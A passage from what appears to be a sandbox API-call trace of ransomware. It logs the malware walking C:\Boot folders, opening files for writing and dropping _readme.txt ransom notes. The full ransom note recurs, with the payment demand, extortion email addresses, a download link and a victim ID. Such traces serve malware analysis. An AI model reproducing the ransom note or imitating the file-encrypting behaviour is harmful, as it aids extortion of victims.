Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.301] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0188.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.301] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.302] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.302] PathFindFileNameW (pszPath="") returned="" [0188.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.302] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.302] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0188.302] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0188.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.303] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81c) returned 0x2e765d0 [0188.305] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0188.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.305] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0188.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.306] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.306] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.306] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.308] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*" (normalized: "c:\\boot\\it-it\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.308] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.308] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.309] PathFindExtensionW (pszPath="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned=".mui" [0188.309] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.309] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.310] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0188.310] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.310] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.312] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0188.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.312] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.312] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.312] PathFindFileNameW (pszPath="") returned="" [0188.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.312] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.312] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0188.313] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e776e0 [0188.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.313] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.313] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0188.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.313] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0188.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.313] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.314] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt 